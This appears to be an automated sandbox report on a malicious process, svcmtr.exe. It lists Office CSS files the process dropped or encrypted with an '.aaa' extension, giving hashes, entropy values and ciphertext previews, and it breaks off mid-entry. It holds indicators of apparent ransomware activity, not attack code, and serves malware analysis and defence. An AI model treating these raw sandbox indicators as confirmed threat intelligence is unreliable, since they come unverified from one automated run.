                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.......N.5;.D..8....eG7l'V..K....u..)6*.q5;b....4..AX.K....e......vq)P.6.W.u...B...:[.9..".....3.......Q.9q{(....BZ(m.2...P..;*.(.....qt.....{).".-}...f...+M!...,.6..}.a.Q(........2....'"....mL.@..E... %...].=.P....K....8.q9h...F...'...:..F7Le.9O..P.....Q.bd.8le.FOg...<...).d"ny.j.i.`.p....hy.@|I.|....A.._@..6...A..2cT......a.70t.:....I.D..'.!X9...d.c..{...lg..?N.<.g.b.7..\'Jr.i.l.Xi.#..o.=.]..g4....5...9.s.....UnLF....u.L..Z%".T.);...<F.H.F....a.\....K.".m....p.Y..~..z...."d..oQ.z.2w.Up...`<.j..z.X..i...JKm..C.........0....h.....}?[..5D.1..9..z1..y...q.xG.).~....2.p.I.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME22.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):130670
                                                                                                                          Entropy (8bit):7.99865503926064
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:l7rWHdd2/1HjXrYQhwq5EhYngw+UYXj+YcdY/dNWdNiJpnHP:lQdY5DrZhw6EJ3UWj2Y/udNwpHP
                                                                                                                          MD5:F5127A78DBFA8152B4ADC81D87C6A4F9
                                                                                                                          SHA1:CA1E2D566B94067EB3B81E030CD389AB4BB0F21D
                                                                                                                          SHA-256:2DA401E678B9E4DC2327E76BF7985E1D29CBCABE6714E21D89DD347B1AA6B3D3
                                                                                                                          SHA-512:6126CAC70B11B11340F9EFA64EE2C935B940EB21D528B33254ED8ECB37288B1261CD0AC0564368ACD9F11E35EFFE0D307537B0DED66ECB98F81D6234D89CCC93
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..J...#..`.~..!.....c.`.`...}..l.....3V*.@....t.K......$...e.b.Q.Q\..8..w5.....Y.Y......R%... .n......|....Q$..................M.;...'c..F..c...\ %K-...+M.M...X.;...D..Ls..R...{ ..G.-..Z7.].]..c..\qu...GNI&.E..s....Pj.Z..|.....k...Q...>d.c.K..I.A.{N2....q..u..O..}.4q.....K.j.d$%\.y<6b<,...=.R.....,..R..j..09$.9..Q..kW[.M}*.....y]`a%Du...g.E.N..8c$v\.")/'-d.'G`..X\?M..`n..i.g}....?.3.0...|.r../@..).G..vz....c..p.=V..=.QL.E$;Ii<...8&cF.........-g..@.WW..... r....L.z...+.m.....(./l.......@....UU.;,.0...E._...a...$......:...Y.<o..,.....7a.V..o..9...9...J.+o..I.ko..

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME22.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):130670
                                                                                                                          Entropy (8bit):7.99865503926064
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:l7rWHdd2/1HjXrYQhwq5EhYngw+UYXj+YcdY/dNWdNiJpnHP:lQdY5DrZhw6EJ3UWj2Y/udNwpHP
                                                                                                                          MD5:F5127A78DBFA8152B4ADC81D87C6A4F9
                                                                                                                          SHA1:CA1E2D566B94067EB3B81E030CD389AB4BB0F21D
                                                                                                                          SHA-256:2DA401E678B9E4DC2327E76BF7985E1D29CBCABE6714E21D89DD347B1AA6B3D3
                                                                                                                          SHA-512:6126CAC70B11B11340F9EFA64EE2C935B940EB21D528B33254ED8ECB37288B1261CD0AC0564368ACD9F11E35EFFE0D307537B0DED66ECB98F81D6234D89CCC93
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..J...#..`.~..!.....c.`.`...}..l.....3V*.@....t.K......$...e.b.Q.Q\..8..w5.....Y.Y......R%... .n......|....Q$..................M.;...'c..F..c...\ %K-...+M.M...X.;...D..Ls..R...{ ..G.-..Z7.].]..c..\qu...GNI&.E..s....Pj.Z..|.....k...Q...>d.c.K..I.A.{N2....q..u..O..}.4q.....K.j.d$%\.y<6b<,...=.R.....,..R..j..09$.9..Q..kW[.M}*.....y]`a%Du...g.E.N..8c$v\.")/'-d.'G`..X\?M..`n..i.g}....?.3.0...|.r../@..).G..vz....c..p.=V..=.QL.E$;Ii<...8&cF.........-g..@.WW..... r....L.z...+.m.....(./l.......@....UU.;,.0...E._...a...$......:...Y.<o..,.....7a.V..o..9...9...J.+o..I.ko..

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME23.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):128926
                                                                                                                          Entropy (8bit):7.99859273254916
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:zCNYFySuLDWIOnxnp8wLMV1QF3iMgUGyhIeD5+WneA8:+NYsLDWBnKJELFnB8
                                                                                                                          MD5:23993A5B23CD42B9C3C8FAFAA617124B
                                                                                                                          SHA1:FEFD955437DE454CFE64A4B90F66083E1F18B2CB
                                                                                                                          SHA-256:F40536FA0BCE3CDCBD01942D0918CE9440E24B203083032EEDBECD2276024FD7
                                                                                                                          SHA-512:1D513C181F8918DE0EEC7AA16F11578D5F949F8802614D92F6A26F9767DFD00F03522DF64FC0EDFBAC5EE6BD45CB397126E531685350C9448C5EBD64023322F9
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..l..6....a3....v.....K..K...W..s.....Xl.....*1.=.-...x....<....c..N.....-5y.*.,..!..|.B._~..er..............a.K(>.E)q-......}.pd....q8..$...VLv........jZ..i....e;.4.ZY*s..r...W..x.?.{s.K....r..W.R%^...859B.e6(^.....*.=e.....|D.E9.%{$...\.`.\Q.Q..S...z!,^0.d.!..[eof$D.@a.?.OS".. .].....M..:.@.`.:M.=aw.oJ...'....Z..:..E...zU..G.*.h..L...r}....H..,9..>....H\J3'n..gL.!PP.J.$ C.A.F.'.3N..>%N+.%.......?../...Pq...j|}....p-S.+.N...m0......X.~..}..y.$L.z.$...{9.._....X...c...#;L..:..X2...t.... .n....P..L.u.......#....$.......Lw..c..).......O.j..!.ZZ...N......vz..........u..Ld.$=%...

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME23.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):128926
                                                                                                                          Entropy (8bit):7.99859273254916
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:zCNYFySuLDWIOnxnp8wLMV1QF3iMgUGyhIeD5+WneA8:+NYsLDWBnKJELFnB8
                                                                                                                          MD5:23993A5B23CD42B9C3C8FAFAA617124B
                                                                                                                          SHA1:FEFD955437DE454CFE64A4B90F66083E1F18B2CB
                                                                                                                          SHA-256:F40536FA0BCE3CDCBD01942D0918CE9440E24B203083032EEDBECD2276024FD7
                                                                                                                          SHA-512:1D513C181F8918DE0EEC7AA16F11578D5F949F8802614D92F6A26F9767DFD00F03522DF64FC0EDFBAC5EE6BD45CB397126E531685350C9448C5EBD64023322F9
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..l..6....a3....v.....K..K...W..s.....Xl.....*1.=.-...x....<....c..N.....-5y.*.,..!..|.B._~..er..............a.K(>.E)q-......}.pd....q8..$...VLv........jZ..i....e;.4.ZY*s..r...W..x.?.{s.K....r..W.R%^...859B.e6(^.....*.=e.....|D.E9.%{$...\.`.\Q.Q..S...z!,^0.d.!..[eof$D.@a.?.OS".. .].....M..:.@.`.:M.=aw.oJ...'....Z..:..E...zU..G.*.h..L...r}....H..,9..>....H\J3'n..gL.!PP.J.$ C.A.F.'.3N..>%N+.%.......?../...Pq...j|}....p-S.+.N...m0......X.~..}..y.$L.z.$...{9.._....X...c...#;L..:..X2...t.... .n....P..L.u.......#....$.......Lw..c..).......O.j..!.ZZ...N......vz..........u..Ld.$=%...

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME24.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):126942
                                                                                                                          Entropy (8bit):7.998526724125108
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:6A4e4CeZ/+PWLpygjgcdRgV6iETc2Fwqe4+L3siXdz3Oc42W9LcG8BZLfzVW6qpi:4FAk+VyTXk3fXRO4W94fLb01QB
                                                                                                                          MD5:4900DBA78DB12D2AD693386AC22D0DF8
                                                                                                                          SHA1:17130E6A6707E9159E2AE44A1FDCE98D3D48FC5A
                                                                                                                          SHA-256:850FD9E7A511FAB524FDD5994D8ED9E22DDDDC22F608E2101CFAA116EB637C04
                                                                                                                          SHA-512:5272BDE6CA4BCAB46B769872A22E721B6B15B2E809A046C1BDB25A355A5E8068BB34FF18014049435F37CF11EB2CB100C5249B52C494DE72040443098DFE7DC0
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..I.u...&.*..e.$..8....5.C`~....F...H.......b....iJ.......:.....\.$..!..[....OeC..'...%.I.E.,@yQ..X..P)..~..3.o[.(~.........<....9..f]..c._..>7}.J.VN.....\k.%..Q...tp.....-{".....7......8]wp....7F.".OEK.\!./}.F....O..c.S.#.......:......h...y..y.qZ..gT.....)....v.J7...A....\.....c.zk{.5E..<.a..*.q...#O.|.i<.>..1r......L"m&..;.iCi...r..6.......S...Z..;wD...W>...8..../.{M.k.......L~.*.9..v.&....i.Q.Lb.$I...$?.n..=s.J...n..\..~<..w.... .*f.......}.ik......7.i.......UEh{..|..g.XXdu..".Gq. ..G...........r}8.2VtSKn.6.8.gx..<u.ryY-.b~...q:+?.*.;.._W..~5eJ...UH^`....k..Tp9_..*B

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME24.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):126942
                                                                                                                          Entropy (8bit):7.998526724125108
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:6A4e4CeZ/+PWLpygjgcdRgV6iETc2Fwqe4+L3siXdz3Oc42W9LcG8BZLfzVW6qpi:4FAk+VyTXk3fXRO4W94fLb01QB
                                                                                                                          MD5:4900DBA78DB12D2AD693386AC22D0DF8
                                                                                                                          SHA1:17130E6A6707E9159E2AE44A1FDCE98D3D48FC5A
                                                                                                                          SHA-256:850FD9E7A511FAB524FDD5994D8ED9E22DDDDC22F608E2101CFAA116EB637C04
                                                                                                                          SHA-512:5272BDE6CA4BCAB46B769872A22E721B6B15B2E809A046C1BDB25A355A5E8068BB34FF18014049435F37CF11EB2CB100C5249B52C494DE72040443098DFE7DC0
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..I.u...&.*..e.$..8....5.C`~....F...H.......b....iJ.......:.....\.$..!..[....OeC..'...%.I.E.,@yQ..X..P)..~..3.o[.(~.........<....9..f]..c._..>7}.J.VN.....\k.%..Q...tp.....-{".....7......8]wp....7F.".OEK.\!./}.F....O..c.S.#.......:......h...y..y.qZ..gT.....)....v.J7...A....\.....c.zk{.5E..<.a..*.q...#O.|.i<.>..1r......L"m&..;.iCi...r..6.......S...Z..;wD...W>...8..../.{M.k.......L~.*.9..v.&....i.Q.Lb.$I...$?.n..=s.J...n..\..~<..w.... .*f.......}.ik......7.i.......UEh{..|..g.XXdu..".Gq. ..G...........r}8.2VtSKn.6.8.gx..<u.ryY-.b~...q:+?.*.;.._W..~5eJ...UH^`....k..Tp9_..*B

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME25.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):130702
                                                                                                                          Entropy (8bit):7.998572521494165
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:2ankQ/a6s+mekuaHjEZaNMTizMu6uXn41vNDA:LnkQTmjpHQZa6ZuH3419A
                                                                                                                          MD5:2FE518E00E2B2AE38FAE41866CC2B61B
                                                                                                                          SHA1:3E904C07096D43E237F0DF719E553C4D6E89575A
                                                                                                                          SHA-256:F0C977DB3E67E5918251EF1FADE8F0750DF6A16363AA10C872DC2504A9BF8EE9
                                                                                                                          SHA-512:434BA75AB621E8660B689523330324C69B81842F6D9CF5E3778FE97532D95CA6F14D3AA088E8BBFF19A173C1156B950B2C7AA86A18CA8B264FA79F82DD038B39
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...e.......".To..........Y..U...x..m.(.....b)#..A.{2..G...gOx...2......}..%99[..^.....T..:.J.cm.JA?|....2...t.;.v;.-um...@..`.D.%..........4w7...".u.R....u.^.5..2a...+U.=j.$c.]..{.U..b\rYh.AL.#).LRC.,.n.5..!.c-'...0SY.1;.M.p...M[.(#...c.-.8....Kj.'T...)..-..Nu2..i......B*......~N.].P..E..u. ~....... ..\.y?4e.&+..V...N..-..+1g%...l.<.......Wp.....{.J..mr...{.b(..d.8@.=.st........[F.#../..,....9.......$&.......^6)...p.].._..5.V.:r..L#=.q...s...?<..7...C.C.p.....S:.z3Jms...Mn..\ke9.y...........&d.C.....S..$......@...j..u..P.l..n0.s\F.`z..YC.......>..+...@.X...q<.5...d.S.U..X..

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME25.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):130702
                                                                                                                          Entropy (8bit):7.998572521494165
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:2ankQ/a6s+mekuaHjEZaNMTizMu6uXn41vNDA:LnkQTmjpHQZa6ZuH3419A
                                                                                                                          MD5:2FE518E00E2B2AE38FAE41866CC2B61B
                                                                                                                          SHA1:3E904C07096D43E237F0DF719E553C4D6E89575A
                                                                                                                          SHA-256:F0C977DB3E67E5918251EF1FADE8F0750DF6A16363AA10C872DC2504A9BF8EE9
                                                                                                                          SHA-512:434BA75AB621E8660B689523330324C69B81842F6D9CF5E3778FE97532D95CA6F14D3AA088E8BBFF19A173C1156B950B2C7AA86A18CA8B264FA79F82DD038B39
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...e.......".To..........Y..U...x..m.(.....b)#..A.{2..G...gOx...2......}..%99[..^.....T..:.J.cm.JA?|....2...t.;.v;.-um...@..`.D.%..........4w7...".u.R....u.^.5..2a...+U.=j.$c.]..{.U..b\rYh.AL.#).LRC.,.n.5..!.c-'...0SY.1;.M.p...M[.(#...c.-.8....Kj.'T...)..-..Nu2..i......B*......~N.].P..E..u. ~....... ..\.y?4e.&+..V...N..-..+1g%...l.<.......Wp.....{.J..mr...{.b(..d.8@.=.st........[F.#../..,....9.......$&.......^6)...p.].._..5.V.:r..L#=.q...s...?<..7...C.C.p.....S:.z3Jms...Mn..\ke9.y...........&d.C.....S..$......@...j..u..P.l..n0.s\F.`z..YC.......>..+...@.X...q<.5...d.S.U..X..

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME26.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):119646
                                                                                                                          Entropy (8bit):7.998338764455375
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:PA92jyc+9u1hoF2/0mQdt2R8upAXhFJ3HTHVyez:oYjyc+A1is/ZlmuiXbiU
                                                                                                                          MD5:670BF5187433D475B03A033D2016AB22
                                                                                                                          SHA1:A39B788DDDE7BED418993ACF16A86EC4714E83AD
                                                                                                                          SHA-256:E0D471E983D3D26D30CA416B15523FB743B3F1501DF1CAF44F2085DF393AD576
                                                                                                                          SHA-512:DB75AFD7F2C232A1B31B37054BA7C37A23B37D1793A778A2D248F404C2AA95D5F98AA0395D103955F070E526EE63E5988C8FC386C380013826152E792AD698FD
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....h..CBqz..VX-._.......w}..L.ZP...?.....}..!....L"..WP.~73....]...EP.c...AD]....)..Z'..A4b..c:;Wb]....3.oZ,...&..s.*..e.;.Z..<......D..;.....*3K..Iqeq.9.S .#f.Wu../......M...)"r.h...*' 3...!.j......e......YL..L...[L.Z~.4...aS..J M...w../.....>l..W1^..A.Pq..4..*..Jtg.D.cG.....yg....>...u.&...)..n....o..=..../.u...U..l...L....S.^.*..X..`..?RVZ.(IRw.."P..[...-.....y5./..*-..|.vT...#..u....\..w.....:../.Ma.....6$....t.X.!J..[..._C .F..I....V..f...#.^...m.. ...eF.1...w.........w....x....:.9Q.>1[........g{.F..UG,z...).KD.2.fE.O.Q.Ga7....@..-f.t...C.o.0.h...+L*....p.U.<...`.@

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME26.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):119646
                                                                                                                          Entropy (8bit):7.998338764455375
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:PA92jyc+9u1hoF2/0mQdt2R8upAXhFJ3HTHVyez:oYjyc+A1is/ZlmuiXbiU
                                                                                                                          MD5:670BF5187433D475B03A033D2016AB22
                                                                                                                          SHA1:A39B788DDDE7BED418993ACF16A86EC4714E83AD
                                                                                                                          SHA-256:E0D471E983D3D26D30CA416B15523FB743B3F1501DF1CAF44F2085DF393AD576
                                                                                                                          SHA-512:DB75AFD7F2C232A1B31B37054BA7C37A23B37D1793A778A2D248F404C2AA95D5F98AA0395D103955F070E526EE63E5988C8FC386C380013826152E792AD698FD
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....h..CBqz..VX-._.......w}..L.ZP...?.....}..!....L"..WP.~73....]...EP.c...AD]....)..Z'..A4b..c:;Wb]....3.oZ,...&..s.*..e.;.Z..<......D..;.....*3K..Iqeq.9.S .#f.Wu../......M...)"r.h...*' 3...!.j......e......YL..L...[L.Z~.4...aS..J M...w../.....>l..W1^..A.Pq..4..*..Jtg.D.cG.....yg....>...u.&...)..n....o..=..../.u...U..l...L....S.^.*..X..`..?RVZ.(IRw.."P..[...-.....y5./..*-..|.vT...#..u....\..w.....:../.Ma.....6$....t.X.!J..[..._C .F..I....V..f...#.^...m.. ...eF.1...w.........w....x....:.9Q.>1[........g{.F..UG,z...).KD.2.fE.O.Q.Ga7....@..-f.t...C.o.0.h...+L*....p.U.<...`.@

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME27.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):123438
                                                                                                                          Entropy (8bit):7.998253221352868
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:HqrptZRfL8t4MJFLJghNsYM57EsV7lZAowJBK0pQ/:Hq9f1TuksYKXPaKmc
                                                                                                                          MD5:12C3576C6B4C9487B750CEB7F341BEB3
                                                                                                                          SHA1:9E2DB525E6B05A8F53905C8EEC133C767D9D6D7D
                                                                                                                          SHA-256:89008466F78281028AB3450EACC3422F4C5F633BF3252F57757694D6E553281F
                                                                                                                          SHA-512:ADBBE59DD9DF40C442033EAADF7C14A308D67AA81CA90571A187E75533516C88FA44C6E28A16033B35E0008C1AA1422B2C2C1874461F9AB0A1957A276AEC2BC5
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264......(l..".<Q......t.2V.....V...Op,......F..JX.,EL.W.q.........9.........q.9y.!7..n.7B$u1v..^.2..|..6....Q...........S7.=2.oo.S..q..D#..<#..-..2Q$....8..nQ..%m...(....#.....hK{.@.H.LG...q.(.a.&.4.s....*.....m>...V.|)L....6.K,.c.%..<..dB.Bj". .'.............ex........\......59..T|:q*.."\.*.....C[1I,.....B_,#...G.:.3....5["..a...J.._J...k=..a.....PO.Y..n.....#..N....Y.......{..z:D.5.l...5FGV.....;..+....E..a./..{..?....`B.h*$....k.D.mS..E.'.F....p!.}.<.&....N}..N.l(\.%.I3.....x1D.(k...:.....iJ..".......]w..~.C.O.].;.....s.5.......7.....2N.s_>..3e(H..,v.Z...4v.w....PY

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME27.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):123438
                                                                                                                          Entropy (8bit):7.998253221352868
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:HqrptZRfL8t4MJFLJghNsYM57EsV7lZAowJBK0pQ/:Hq9f1TuksYKXPaKmc
                                                                                                                          MD5:12C3576C6B4C9487B750CEB7F341BEB3
                                                                                                                          SHA1:9E2DB525E6B05A8F53905C8EEC133C767D9D6D7D
                                                                                                                          SHA-256:89008466F78281028AB3450EACC3422F4C5F633BF3252F57757694D6E553281F
                                                                                                                          SHA-512:ADBBE59DD9DF40C442033EAADF7C14A308D67AA81CA90571A187E75533516C88FA44C6E28A16033B35E0008C1AA1422B2C2C1874461F9AB0A1957A276AEC2BC5
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264......(l..".<Q......t.2V.....V...Op,......F..JX.,EL.W.q.........9.........q.9y.!7..n.7B$u1v..^.2..|..6....Q...........S7.=2.oo.S..q..D#..<#..-..2Q$....8..nQ..%m...(....#.....hK{.@.H.LG...q.(.a.&.4.s....*.....m>...V.|)L....6.K,.c.%..<..dB.Bj". .'.............ex........\......59..T|:q*.."\.*.....C[1I,.....B_,#...G.:.3....5["..a...J.._J...k=..a.....PO.Y..n.....#..N....Y.......{..z:D.5.l...5FGV.....;..+....E..a./..{..?....`B.h*$....k.D.mS..E.'.F....p!.}.<.&....N}..N.l(\.%.I3.....x1D.(k...:.....iJ..".......]w..~.C.O.].;.....s.5.......7.....2N.s_>..3e(H..,v.Z...4v.w....PY

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME28.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):121086
                                                                                                                          Entropy (8bit):7.99852619771096
                                                                                                                          Encrypted:true
